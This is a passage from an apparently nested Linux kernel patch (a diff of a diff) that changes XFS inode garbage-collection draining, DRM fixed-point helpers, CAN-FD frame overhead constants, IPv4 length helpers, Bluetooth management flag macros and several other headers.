+ 	struct llist_node	*node = llist_del_all(&gc->list);
+ 	struct xfs_inode	*ip, *n;
+ 
++	ASSERT(gc->cpu == smp_processor_id());
++
+ 	WRITE_ONCE(gc->items, 0);
+ 
+ 	if (!node)
+@@ -1892,24 +1899,41 @@ xfs_inodegc_flush(
+ 
+ /*
+  * Flush all the pending work and then disable the inode inactivation background
+- * workers and wait for them to stop.
++ * workers and wait for them to stop.  Caller must hold sb->s_umount to
++ * coordinate changes in the inodegc_enabled state.
+  */
+ void
+ xfs_inodegc_stop(
+ 	struct xfs_mount	*mp)
+ {
++	bool			rerun;
++
+ 	if (!xfs_clear_inodegc_enabled(mp))
+ 		return;
+ 
++	/*
++	 * Drain all pending inodegc work, including inodes that could be
++	 * queued by racing xfs_inodegc_queue or xfs_inodegc_shrinker_scan
++	 * threads that sample the inodegc state just prior to us clearing it.
++	 * The inodegc flag state prevents new threads from queuing more
++	 * inodes, so we queue pending work items and flush the workqueue until
++	 * all inodegc lists are empty.  IOWs, we cannot use drain_workqueue
++	 * here because it does not allow other unserialized mechanisms to
++	 * reschedule inodegc work while this draining is in progress.
++	 */
+ 	xfs_inodegc_queue_all(mp);
+-	drain_workqueue(mp->m_inodegc_wq);
++	do {
++		flush_workqueue(mp->m_inodegc_wq);
++		rerun = xfs_inodegc_queue_all(mp);
++	} while (rerun);
+ 
+ 	trace_xfs_inodegc_stop(mp, __return_address);
+ }
+ 
+ /*
+  * Enable the inode inactivation background workers and schedule deferred inode
+- * inactivation work if there is any.
++ * inactivation work if there is any.  Caller must hold sb->s_umount to
++ * coordinate changes in the inodegc_enabled state.
+  */
+ void
+ xfs_inodegc_start(
+@@ -2052,7 +2076,8 @@ xfs_inodegc_queue(
+ 		queue_delay = 0;
+ 
+ 	trace_xfs_inodegc_queue(mp, __return_address);
+-	mod_delayed_work(mp->m_inodegc_wq, &gc->work, queue_delay);
++	mod_delayed_work_on(current_cpu(), mp->m_inodegc_wq, &gc->work,
++			queue_delay);
+ 	put_cpu_ptr(gc);
+ 
+ 	if (xfs_inodegc_want_flush_work(ip, items, shrinker_hits)) {
+@@ -2096,7 +2121,8 @@ xfs_inodegc_cpu_dead(
+ 
+ 	if (xfs_is_inodegc_enabled(mp)) {
+ 		trace_xfs_inodegc_queue(mp, __return_address);
+-		mod_delayed_work(mp->m_inodegc_wq, &gc->work, 0);
++		mod_delayed_work_on(current_cpu(), mp->m_inodegc_wq, &gc->work,
++				0);
+ 	}
+ 	put_cpu_ptr(gc);
+ }
+diff --git a/fs/xfs/xfs_mount.h b/fs/xfs/xfs_mount.h
+index 8aca2cc173ac1..69ddd53196344 100644
+--- a/fs/xfs/xfs_mount.h
++++ b/fs/xfs/xfs_mount.h
+@@ -66,6 +66,9 @@ struct xfs_inodegc {
+ 	/* approximate count of inodes in the list */
+ 	unsigned int		items;
+ 	unsigned int		shrinker_hits;
++#if defined(DEBUG) || defined(XFS_WARN)
++	unsigned int		cpu;
++#endif
+ };
+ 
+ /*
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index ee4b429a2f2c9..4b179526913f4 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1084,6 +1084,9 @@ xfs_inodegc_init_percpu(
+ 
+ 	for_each_possible_cpu(cpu) {
+ 		gc = per_cpu_ptr(mp->m_inodegc, cpu);
++#if defined(DEBUG) || defined(XFS_WARN)
++		gc->cpu = cpu;
++#endif
+ 		init_llist_head(&gc->list);
+ 		gc->items = 0;
+ 		INIT_DELAYED_WORK(&gc->work, xfs_inodegc_worker);
+diff --git a/include/crypto/internal/kpp.h b/include/crypto/internal/kpp.h
+index 9cb0662ebe871..31ff3c1986ef0 100644
+--- a/include/crypto/internal/kpp.h
++++ b/include/crypto/internal/kpp.h
+@@ -50,6 +50,12 @@ static inline void *kpp_request_ctx(struct kpp_request *req)
+ 	return req->__ctx;
+ }
+ 
++static inline void kpp_set_reqsize(struct crypto_kpp *kpp,
++				   unsigned int reqsize)
++{
++	crypto_kpp_alg(kpp)->reqsize = reqsize;
++}
++
+ static inline void *kpp_tfm_ctx(struct crypto_kpp *tfm)
+ {
+ 	return tfm->base.__crt_ctx;
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 288c6feda5de2..6b656ea23b964 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -768,6 +768,14 @@ struct drm_bridge {
+ 	 * modes.
+ 	 */
+ 	bool interlace_allowed;
++	/**
++	 * @pre_enable_prev_first: The bridge requires that the prev
++	 * bridge @pre_enable function is called before its @pre_enable,
++	 * and conversely for post_disable. This is most frequently a
++	 * requirement for DSI devices which need the host to be initialised
++	 * before the peripheral.
++	 */
++	bool pre_enable_prev_first;
+ 	/**
+ 	 * @ddc: Associated I2C adapter for DDC access, if any.
+ 	 */
+diff --git a/include/drm/drm_fixed.h b/include/drm/drm_fixed.h
+index 553210c02ee0f..03cb890690e83 100644
+--- a/include/drm/drm_fixed.h
++++ b/include/drm/drm_fixed.h
+@@ -70,6 +70,7 @@ static inline u32 dfixed_div(fixed20_12 A, fixed20_12 B)
+ }
+ 
+ #define DRM_FIXED_POINT		32
++#define DRM_FIXED_POINT_HALF	16
+ #define DRM_FIXED_ONE		(1ULL << DRM_FIXED_POINT)
+ #define DRM_FIXED_DECIMAL_MASK	(DRM_FIXED_ONE - 1)
+ #define DRM_FIXED_DIGITS_MASK	(~DRM_FIXED_DECIMAL_MASK)
+@@ -86,6 +87,11 @@ static inline int drm_fixp2int(s64 a)
+ 	return ((s64)a) >> DRM_FIXED_POINT;
+ }
+ 
++static inline int drm_fixp2int_round(s64 a)
++{
++	return drm_fixp2int(a + (1 << (DRM_FIXED_POINT_HALF - 1)));
++}
++
+ static inline int drm_fixp2int_ceil(s64 a)
+ {
+ 	if (a > 0)
+diff --git a/include/linux/bitmap.h b/include/linux/bitmap.h
+index 7d6d73b781472..03644237e1efb 100644
+--- a/include/linux/bitmap.h
++++ b/include/linux/bitmap.h
+@@ -302,12 +302,10 @@ void bitmap_to_arr32(u32 *buf, const unsigned long *bitmap,
+ #endif
+ 
+ /*
+- * On 64-bit systems bitmaps are represented as u64 arrays internally. On LE32
+- * machines the order of hi and lo parts of numbers match the bitmap structure.
+- * In both cases conversion is not needed when copying data from/to arrays of
+- * u64.
++ * On 64-bit systems bitmaps are represented as u64 arrays internally. So,
++ * the conversion is not needed when copying data from/to arrays of u64.
+  */
+-#if (BITS_PER_LONG == 32) && defined(__BIG_ENDIAN)
++#if BITS_PER_LONG == 32
+ void bitmap_from_arr64(unsigned long *bitmap, const u64 *buf, unsigned int nbits);
+ void bitmap_to_arr64(u64 *buf, const unsigned long *bitmap, unsigned int nbits);
+ #else
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index a9764cbf7f8d2..e4f676e1042b5 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -745,8 +745,7 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ struct blk_mq_tags {
+ 	unsigned int nr_tags;
+ 	unsigned int nr_reserved_tags;
+-
+-	atomic_t active_queues;
++	unsigned int active_queues;
+ 
+ 	struct sbitmap_queue bitmap_tags;
+ 	struct sbitmap_queue breserved_tags;
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 891f8cbcd0436..427e79ac72194 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -1305,7 +1305,7 @@ static inline bool bdev_is_zoned(struct block_device *bdev)
+ }
+ 
+ static inline bool bdev_op_is_zoned_write(struct block_device *bdev,
+-					  blk_opf_t op)
++					  enum req_op op)
+ {
+ 	if (!bdev_is_zoned(bdev))
+ 		return false;
+diff --git a/include/linux/blktrace_api.h b/include/linux/blktrace_api.h
+index cfbda114348c9..122c62e561fc7 100644
+--- a/include/linux/blktrace_api.h
++++ b/include/linux/blktrace_api.h
+@@ -85,10 +85,14 @@ extern int blk_trace_remove(struct request_queue *q);
+ # define blk_add_driver_data(rq, data, len)		do {} while (0)
+ # define blk_trace_setup(q, name, dev, bdev, arg)	(-ENOTTY)
+ # define blk_trace_startstop(q, start)			(-ENOTTY)
+-# define blk_trace_remove(q)				(-ENOTTY)
+ # define blk_add_trace_msg(q, fmt, ...)			do { } while (0)
+ # define blk_add_cgroup_trace_msg(q, cg, fmt, ...)	do { } while (0)
+ # define blk_trace_note_message_enabled(q)		(false)
++
++static inline int blk_trace_remove(struct request_queue *q)
++{
++	return -ENOTTY;
++}
+ #endif /* CONFIG_BLK_DEV_IO_TRACE */
+ 
+ #ifdef CONFIG_COMPAT
+diff --git a/include/linux/bootmem_info.h b/include/linux/bootmem_info.h
+index cc35d010fa949..e1a3c9c9754c5 100644
+--- a/include/linux/bootmem_info.h
++++ b/include/linux/bootmem_info.h
+@@ -3,6 +3,7 @@
+ #define __LINUX_BOOTMEM_INFO_H
+ 
+ #include <linux/mm.h>
++#include <linux/kmemleak.h>
+ 
+ /*
+  * Types for free bootmem stored in page->lru.next. These have to be in
+@@ -59,6 +60,7 @@ static inline void get_page_bootmem(unsigned long info, struct page *page,
+ 
+ static inline void free_bootmem_page(struct page *page)
+ {
++	kmemleak_free_part(page_to_virt(page), PAGE_SIZE);
+ 	free_reserved_page(page);
+ }
+ #endif
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 942f9ac9fa7b6..8cef9ec3a89c2 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -933,7 +933,6 @@ struct bpf_trampoline {
+ 	int progs_cnt[BPF_TRAMP_MAX];
+ 	/* Executable image of trampoline */
+ 	struct bpf_tramp_image *cur_image;
+-	u64 selector;
+ 	struct module *mod;
+ };
+ 
+diff --git a/include/linux/can/length.h b/include/linux/can/length.h
+index 6995092b774ec..ef1fd32cef16b 100644
+--- a/include/linux/can/length.h
++++ b/include/linux/can/length.h
+@@ -69,17 +69,18 @@
+  * Error Status Indicator (ESI)		1
+  * Data length code (DLC)		4
+  * Data field				0...512
+- * Stuff Bit Count (SBC)		0...16: 4 20...64:5
++ * Stuff Bit Count (SBC)		4
+  * CRC					0...16: 17 20...64:21
+  * CRC delimiter (CD)			1
++ * Fixed Stuff bits (FSB)		0...16: 6 20...64:7
+  * ACK slot (AS)			1
+  * ACK delimiter (AD)			1
+  * End-of-frame (EOF)			7
+  * Inter frame spacing			3
+  *
+- * assuming CRC21, rounded up and ignoring bitstuffing
++ * assuming CRC21, rounded up and ignoring dynamic bitstuffing
+  */
+-#define CANFD_FRAME_OVERHEAD_SFF DIV_ROUND_UP(61, 8)
++#define CANFD_FRAME_OVERHEAD_SFF DIV_ROUND_UP(67, 8)
+ 
+ /*
+  * Size of a CAN-FD Extended Frame
+@@ -98,17 +99,18 @@
+  * Error Status Indicator (ESI)		1
+  * Data length code (DLC)		4
+  * Data field				0...512
+- * Stuff Bit Count (SBC)		0...16: 4 20...64:5
++ * Stuff Bit Count (SBC)		4
+  * CRC					0...16: 17 20...64:21
+  * CRC delimiter (CD)			1
++ * Fixed Stuff bits (FSB)		0...16: 6 20...64:7
+  * ACK slot (AS)			1
+  * ACK delimiter (AD)			1
+  * End-of-frame (EOF)			7
+  * Inter frame spacing			3
+  *
+- * assuming CRC21, rounded up and ignoring bitstuffing
++ * assuming CRC21, rounded up and ignoring dynamic bitstuffing
+  */
+-#define CANFD_FRAME_OVERHEAD_EFF DIV_ROUND_UP(80, 8)
++#define CANFD_FRAME_OVERHEAD_EFF DIV_ROUND_UP(86, 8)
+ 
+ /*
+  * Maximum size of a Classical CAN frame
+diff --git a/include/linux/dsa/sja1105.h b/include/linux/dsa/sja1105.h
+index 159e43171cccf..c177322f793d6 100644
+--- a/include/linux/dsa/sja1105.h
++++ b/include/linux/dsa/sja1105.h
+@@ -48,13 +48,9 @@ struct sja1105_deferred_xmit_work {
+ 
+ /* Global tagger data */
+ struct sja1105_tagger_data {
+-	/* Tagger to switch */
+ 	void (*xmit_work_fn)(struct kthread_work *work);
+ 	void (*meta_tstamp_handler)(struct dsa_switch *ds, int port, u8 ts_id,
+ 				    enum sja1110_meta_tstamp dir, u64 tstamp);
+-	/* Switch to tagger */
+-	bool (*rxtstamp_get_state)(struct dsa_switch *ds);
+-	void (*rxtstamp_set_state)(struct dsa_switch *ds, bool on);
+ };
+ 
+ struct sja1105_skb_cb {
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index d3088666f3f44..870ae4cd82029 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4573,17 +4573,13 @@ static inline u8 ieee80211_mle_common_size(const u8 *data)
+ 
+ 	switch (u16_get_bits(control, IEEE80211_ML_CONTROL_TYPE)) {
+ 	case IEEE80211_ML_CONTROL_TYPE_BASIC:
+-		common += sizeof(struct ieee80211_mle_basic_common_info);
+-		break;
+ 	case IEEE80211_ML_CONTROL_TYPE_PREQ:
+-		common += sizeof(struct ieee80211_mle_preq_common_info);
+-		break;
+-	case IEEE80211_ML_CONTROL_TYPE_RECONF:
+-		if (control & IEEE80211_MLC_RECONF_PRES_MLD_MAC_ADDR)
+-			common += ETH_ALEN;
+-		return common;
+ 	case IEEE80211_ML_CONTROL_TYPE_TDLS:
+-		common += sizeof(struct ieee80211_mle_tdls_common_info);
++	case IEEE80211_ML_CONTROL_TYPE_RECONF:
++		/*
++		 * The length is the first octet pointed by mle->variable so no
++		 * need to add anything
++		 */
+ 		break;
+ 	case IEEE80211_ML_CONTROL_TYPE_PRIO_ACCESS:
+ 		if (control & IEEE80211_MLC_PRIO_ACCESS_PRES_AP_MLD_MAC_ADDR)
+diff --git a/include/linux/ip.h b/include/linux/ip.h
+index 3d9c6750af627..d11c25f5030a0 100644
+--- a/include/linux/ip.h
++++ b/include/linux/ip.h
+@@ -35,4 +35,25 @@ static inline unsigned int ip_transport_len(const struct sk_buff *skb)
+ {
+ 	return ntohs(ip_hdr(skb)->tot_len) - skb_network_header_len(skb);
+ }
++
++static inline unsigned int iph_totlen(const struct sk_buff *skb, const struct iphdr *iph)
++{
++	u32 len = ntohs(iph->tot_len);
++
++	return (len || !skb_is_gso(skb) || !skb_is_gso_tcp(skb)) ?
++	       len : skb->len - skb_network_offset(skb);
++}
++
++static inline unsigned int skb_ip_totlen(const struct sk_buff *skb)
++{
++	return iph_totlen(skb, ip_hdr(skb));
++}
++
++/* IPv4 datagram length is stored into 16bit field (tot_len) */
++#define IP_MAX_MTU	0xFFFFU
++
++static inline void iph_set_totlen(struct iphdr *iph, unsigned int len)
++{
++	iph->tot_len = len <= IP_MAX_MTU ? htons(len) : 0;
++}
+ #endif	/* _LINUX_IP_H */
+diff --git a/include/linux/mmc/card.h b/include/linux/mmc/card.h
+index c726ea7812552..daa2f40d9ce65 100644
+--- a/include/linux/mmc/card.h
++++ b/include/linux/mmc/card.h
+@@ -294,6 +294,7 @@ struct mmc_card {
+ #define MMC_QUIRK_TRIM_BROKEN	(1<<12)		/* Skip trim */
+ #define MMC_QUIRK_BROKEN_HPI	(1<<13)		/* Disable broken HPI support */
+ #define MMC_QUIRK_BROKEN_SD_DISCARD	(1<<14)	/* Disable broken SD discard support */
++#define MMC_QUIRK_BROKEN_SD_CACHE	(1<<15)	/* Disable broken SD cache support */
+ 
+ 	bool			reenable_cmdq;	/* Re-enable Command Queue */
+ 
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index d5eb3ab8e38f2..5a04fbf724768 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -5028,6 +5028,15 @@ static inline bool netif_is_l3_slave(const struct net_device *dev)
+ 	return dev->priv_flags & IFF_L3MDEV_SLAVE;
+ }
+ 
++static inline int dev_sdif(const struct net_device *dev)
++{
++#ifdef CONFIG_NET_L3_MASTER_DEV
++	if (netif_is_l3_slave(dev))
++		return dev->ifindex;
++#endif
++	return 0;
++}
++
+ static inline bool netif_is_bridge_master(const struct net_device *dev)
+ {
+ 	return dev->priv_flags & IFF_EBRIDGE;
+diff --git a/include/linux/nmi.h b/include/linux/nmi.h
+index f700ff2df074e..0db377ff8f608 100644
+--- a/include/linux/nmi.h
++++ b/include/linux/nmi.h
+@@ -197,7 +197,7 @@ u64 hw_nmi_get_sample_period(int watchdog_thresh);
+ #endif
+ 
+ #if defined(CONFIG_HARDLOCKUP_CHECK_TIMESTAMP) && \
+-    defined(CONFIG_HARDLOCKUP_DETECTOR)
++    defined(CONFIG_HARDLOCKUP_DETECTOR_PERF)
+ void watchdog_update_hrtimer_threshold(u64 period);
+ #else
+ static inline void watchdog_update_hrtimer_threshold(u64 period) { }
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index d20695184e0b9..9f617ffdb863f 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1809,6 +1809,7 @@ static inline int pci_dev_present(const struct pci_device_id *ids)
+ #define pci_dev_put(dev)	do { } while (0)
+ 
+ static inline void pci_set_master(struct pci_dev *dev) { }
++static inline void pci_clear_master(struct pci_dev *dev) { }
+ static inline int pci_enable_device(struct pci_dev *dev) { return -EIO; }
+ static inline void pci_disable_device(struct pci_dev *dev) { }
+ static inline int pcim_enable_device(struct pci_dev *pdev) { return -EIO; }
+diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h
+index 6cb65df3e3ba5..28b3c6a673975 100644
+--- a/include/linux/pipe_fs_i.h
++++ b/include/linux/pipe_fs_i.h
+@@ -241,18 +241,14 @@ void generic_pipe_buf_release(struct pipe_inode_info *, struct pipe_buffer *);
+ 
+ extern const struct pipe_buf_operations nosteal_pipe_buf_ops;
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+ unsigned long account_pipe_buffers(struct user_struct *user,
+ 				   unsigned long old, unsigned long new);
+ bool too_many_pipe_buffers_soft(unsigned long user_bufs);
+ bool too_many_pipe_buffers_hard(unsigned long user_bufs);
+ bool pipe_is_unprivileged_user(void);
+-#endif
+ 
+ /* for F_SETPIPE_SZ and F_GETPIPE_SZ */
+-#ifdef CONFIG_WATCH_QUEUE
+ int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots);
+-#endif
+ long pipe_fcntl(struct file *, unsigned int, unsigned long arg);
+ struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice);
+ 
+diff --git a/include/linux/ramfs.h b/include/linux/ramfs.h
+index 917528d102c4e..d506dc63dd47c 100644
+--- a/include/linux/ramfs.h
++++ b/include/linux/ramfs.h
+@@ -7,6 +7,7 @@
+ struct inode *ramfs_get_inode(struct super_block *sb, const struct inode *dir,
+ 	 umode_t mode, dev_t dev);
+ extern int ramfs_init_fs_context(struct fs_context *fc);
++extern void ramfs_kill_sb(struct super_block *sb);
+ 
+ #ifdef CONFIG_MMU
+ static inline int
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index 37ad81058d6ae..27ae79191bdc3 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -13,9 +13,9 @@
+ /*
+  * Convert back and forth between INTEVT and IRQ values.
+  */
+-#ifdef CONFIG_CPU_HAS_INTEVT
+-#define evt2irq(evt)		(((evt) >> 5) - 16)
+-#define irq2evt(irq)		(((irq) + 16) << 5)
++#ifdef CONFIG_CPU_HAS_INTEVT	/* Avoid IRQ0 (invalid for platform devices) */
++#define evt2irq(evt)		((evt) >> 5)
++#define irq2evt(irq)		((irq) << 5)
+ #else
+ #define evt2irq(evt)		(evt)
+ #define irq2evt(irq)		(irq)
+diff --git a/include/linux/watch_queue.h b/include/linux/watch_queue.h
+index fc6bba20273bd..45cd42f55d492 100644
+--- a/include/linux/watch_queue.h
++++ b/include/linux/watch_queue.h
+@@ -38,7 +38,7 @@ struct watch_filter {
+ struct watch_queue {
+ 	struct rcu_head		rcu;
+ 	struct watch_filter __rcu *filter;
+-	struct pipe_inode_info	*pipe;		/* The pipe we're using as a buffer */
++	struct pipe_inode_info	*pipe;		/* Pipe we use as a buffer, NULL if queue closed */
+ 	struct hlist_head	watches;	/* Contributory watches */
+ 	struct page		**notes;	/* Preallocated notifications */
+ 	unsigned long		*notes_bitmap;	/* Allocation bitmap for notes */
+@@ -46,7 +46,6 @@ struct watch_queue {
+ 	spinlock_t		lock;
+ 	unsigned int		nr_notes;	/* Number of notes */
+ 	unsigned int		nr_pages;	/* Number of pages in notes[] */
+-	bool			defunct;	/* T when queues closed */
+ };
+ 
+ /*
+diff --git a/include/net/bluetooth/mgmt.h b/include/net/bluetooth/mgmt.h
+index 743f6f59dff81..5e68b3dd44222 100644
+--- a/include/net/bluetooth/mgmt.h
++++ b/include/net/bluetooth/mgmt.h
+@@ -91,24 +91,26 @@ struct mgmt_rp_read_index_list {
+ #define MGMT_MAX_NAME_LENGTH		(HCI_MAX_NAME_LENGTH + 1)
+ #define MGMT_MAX_SHORT_NAME_LENGTH	(HCI_MAX_SHORT_NAME_LENGTH + 1)
+ 
+-#define MGMT_SETTING_POWERED		0x00000001
+-#define MGMT_SETTING_CONNECTABLE	0x00000002
+-#define MGMT_SETTING_FAST_CONNECTABLE	0x00000004
+-#define MGMT_SETTING_DISCOVERABLE	0x00000008
+-#define MGMT_SETTING_BONDABLE		0x00000010
+-#define MGMT_SETTING_LINK_SECURITY	0x00000020
+-#define MGMT_SETTING_SSP		0x00000040
+-#define MGMT_SETTING_BREDR		0x00000080
+-#define MGMT_SETTING_HS			0x00000100
+-#define MGMT_SETTING_LE			0x00000200
+-#define MGMT_SETTING_ADVERTISING	0x00000400
+-#define MGMT_SETTING_SECURE_CONN	0x00000800
+-#define MGMT_SETTING_DEBUG_KEYS		0x00001000
+-#define MGMT_SETTING_PRIVACY		0x00002000
+-#define MGMT_SETTING_CONFIGURATION	0x00004000
+-#define MGMT_SETTING_STATIC_ADDRESS	0x00008000
+-#define MGMT_SETTING_PHY_CONFIGURATION	0x00010000
+-#define MGMT_SETTING_WIDEBAND_SPEECH	0x00020000
++#define MGMT_SETTING_POWERED		BIT(0)
++#define MGMT_SETTING_CONNECTABLE	BIT(1)
++#define MGMT_SETTING_FAST_CONNECTABLE	BIT(2)
++#define MGMT_SETTING_DISCOVERABLE	BIT(3)
++#define MGMT_SETTING_BONDABLE		BIT(4)
++#define MGMT_SETTING_LINK_SECURITY	BIT(5)
++#define MGMT_SETTING_SSP		BIT(6)
++#define MGMT_SETTING_BREDR		BIT(7)
++#define MGMT_SETTING_HS			BIT(8)
++#define MGMT_SETTING_LE			BIT(9)
++#define MGMT_SETTING_ADVERTISING	BIT(10)
++#define MGMT_SETTING_SECURE_CONN	BIT(11)
++#define MGMT_SETTING_DEBUG_KEYS		BIT(12)
++#define MGMT_SETTING_PRIVACY		BIT(13)
++#define MGMT_SETTING_CONFIGURATION	BIT(14)
++#define MGMT_SETTING_STATIC_ADDRESS	BIT(15)
++#define MGMT_SETTING_PHY_CONFIGURATION	BIT(16)
++#define MGMT_SETTING_WIDEBAND_SPEECH	BIT(17)
++#define MGMT_SETTING_CIS_CENTRAL	BIT(18)
++#define MGMT_SETTING_CIS_PERIPHERAL	BIT(19)
+ 
+ #define MGMT_OP_READ_INFO		0x0004
+ #define MGMT_READ_INFO_SIZE		0
+@@ -633,21 +635,21 @@ struct mgmt_rp_get_phy_configuration {
+ } __packed;
+ #define MGMT_GET_PHY_CONFIGURATION_SIZE	0
+ 
+-#define MGMT_PHY_BR_1M_1SLOT	0x00000001
+-#define MGMT_PHY_BR_1M_3SLOT	0x00000002
+-#define MGMT_PHY_BR_1M_5SLOT	0x00000004
+-#define MGMT_PHY_EDR_2M_1SLOT	0x00000008
+-#define MGMT_PHY_EDR_2M_3SLOT	0x00000010
+-#define MGMT_PHY_EDR_2M_5SLOT	0x00000020
+-#define MGMT_PHY_EDR_3M_1SLOT	0x00000040
+-#define MGMT_PHY_EDR_3M_3SLOT	0x00000080
+-#define MGMT_PHY_EDR_3M_5SLOT	0x00000100
+-#define MGMT_PHY_LE_1M_TX		0x00000200
+-#define MGMT_PHY_LE_1M_RX		0x00000400
+-#define MGMT_PHY_LE_2M_TX		0x00000800
+-#define MGMT_PHY_LE_2M_RX		0x00001000
+-#define MGMT_PHY_LE_CODED_TX	0x00002000
+-#define MGMT_PHY_LE_CODED_RX	0x00004000
++#define MGMT_PHY_BR_1M_1SLOT		BIT(0)
++#define MGMT_PHY_BR_1M_3SLOT		BIT(1)
++#define MGMT_PHY_BR_1M_5SLOT		BIT(2)
++#define MGMT_PHY_EDR_2M_1SLOT		BIT(3)
++#define MGMT_PHY_EDR_2M_3SLOT		BIT(4)
++#define MGMT_PHY_EDR_2M_5SLOT		BIT(5)
++#define MGMT_PHY_EDR_3M_1SLOT		BIT(6)
++#define MGMT_PHY_EDR_3M_3SLOT		BIT(7)
++#define MGMT_PHY_EDR_3M_5SLOT		BIT(8)
++#define MGMT_PHY_LE_1M_TX		BIT(9)
++#define MGMT_PHY_LE_1M_RX		BIT(10)
++#define MGMT_PHY_LE_2M_TX		BIT(11)
++#define MGMT_PHY_LE_2M_RX		BIT(12)
++#define MGMT_PHY_LE_CODED_TX		BIT(13)
++#define MGMT_PHY_LE_CODED_RX		BIT(14)
+ 
+ #define MGMT_PHY_BREDR_MASK (MGMT_PHY_BR_1M_1SLOT | MGMT_PHY_BR_1M_3SLOT | \
+ 			     MGMT_PHY_BR_1M_5SLOT | MGMT_PHY_EDR_2M_1SLOT | \
+@@ -972,11 +974,12 @@ struct mgmt_ev_auth_failed {
+ 	__u8	status;
+ } __packed;
+ 
+-#define MGMT_DEV_FOUND_CONFIRM_NAME		0x01
+-#define MGMT_DEV_FOUND_LEGACY_PAIRING		0x02
+-#define MGMT_DEV_FOUND_NOT_CONNECTABLE		0x04
+-#define MGMT_DEV_FOUND_INITIATED_CONN		0x08
+-#define MGMT_DEV_FOUND_NAME_REQUEST_FAILED	0x10
++#define MGMT_DEV_FOUND_CONFIRM_NAME		BIT(0)
++#define MGMT_DEV_FOUND_LEGACY_PAIRING		BIT(1)
++#define MGMT_DEV_FOUND_NOT_CONNECTABLE		BIT(2)
++#define MGMT_DEV_FOUND_INITIATED_CONN		BIT(3)
++#define MGMT_DEV_FOUND_NAME_REQUEST_FAILED	BIT(4)
++#define MGMT_DEV_FOUND_SCAN_RSP			BIT(5)
+ 
+ #define MGMT_EV_DEVICE_FOUND		0x0012
+ struct mgmt_ev_device_found {
+diff --git a/include/net/regulatory.h b/include/net/regulatory.h
+index 896191f420d50..b2cb4a9eb04dc 100644
+--- a/include/net/regulatory.h
++++ b/include/net/regulatory.h
+@@ -140,17 +140,6 @@ struct regulatory_request {
+  *      otherwise initiating radiation is not allowed. This will enable the
+  *      relaxations enabled under the CFG80211_REG_RELAX_NO_IR configuration
+  *      option
+- * @REGULATORY_IGNORE_STALE_KICKOFF: the regulatory core will _not_ make sure
+- *	all interfaces on this wiphy reside on allowed channels. If this flag
+- *	is not set, upon a regdomain change, the interfaces are given a grace
+- *	period (currently 60 seconds) to disconnect or move to an allowed
+- *	channel. Interfaces on forbidden channels are forcibly disconnected.
+- *	Currently these types of interfaces are supported for enforcement:
+- *	NL80211_IFTYPE_ADHOC, NL80211_IFTYPE_STATION, NL80211_IFTYPE_AP,
+- *	NL80211_IFTYPE_AP_VLAN, NL80211_IFTYPE_MONITOR,
+- *	NL80211_IFTYPE_P2P_CLIENT, NL80211_IFTYPE_P2P_GO,
+- *	NL80211_IFTYPE_P2P_DEVICE. The flag will be set by default if a device
+- *	includes any modes unsupported for enforcement checking.
+  * @REGULATORY_WIPHY_SELF_MANAGED: for devices that employ wiphy-specific
+  *	regdom management. These devices will ignore all regdom changes not
+  *	originating from their own wiphy.
+@@ -177,7 +166,7 @@ enum ieee80211_regulatory_flags {
+ 	REGULATORY_COUNTRY_IE_FOLLOW_POWER	= BIT(3),
+ 	REGULATORY_COUNTRY_IE_IGNORE		= BIT(4),
+ 	REGULATORY_ENABLE_RELAX_NO_IR           = BIT(5),
+-	REGULATORY_IGNORE_STALE_KICKOFF         = BIT(6),
++	/* reuse bit 6 next time */
+ 	REGULATORY_WIPHY_SELF_MANAGED		= BIT(7),
+ };
+ 
+diff --git a/include/net/route.h b/include/net/route.h
+index 6e92dd5bcd613..fe00b0a2e4759 100644
+--- a/include/net/route.h
++++ b/include/net/route.h
+@@ -35,9 +35,6 @@
+ #include <linux/cache.h>
+ #include <linux/security.h>
+ 
+-/* IPv4 datagram length is stored into 16bit field (tot_len) */
+-#define IP_MAX_MTU	0xFFFFU
+-
+ #define RTO_ONLINK	0x01
+ 
+ #define RT_CONN_FLAGS(sk)   (RT_TOS(inet_sk(sk)->tos) | sock_flag(sk, SOCK_LOCALROUTE))
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 2f35b82a123f8..1bbdddcf61542 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2124,6 +2124,7 @@ static inline void sock_graft(struct sock *sk, struct socket *parent)
+ }
+ 
+ kuid_t sock_i_uid(struct sock *sk);
++unsigned long __sock_i_ino(struct sock *sk);
+ unsigned long sock_i_ino(struct sock *sk);
+ 
+ static inline kuid_t sock_net_uid(const struct net *net, const struct sock *sk)
+diff --git a/include/soc/mscc/ocelot.h b/include/soc/mscc/ocelot.h
+index 967ba30ea6363..195ca8f0b6f9d 100644
+--- a/include/soc/mscc/ocelot.h
++++ b/include/soc/mscc/ocelot.h
+@@ -902,6 +902,11 @@ enum macaccess_entry_type {
+ 	ENTRYTYPE_MACv6,
+ };
+ 
++enum ocelot_proto {
++	OCELOT_PROTO_PTP_L2 = BIT(0),
++	OCELOT_PROTO_PTP_L4 = BIT(1),
++};
++
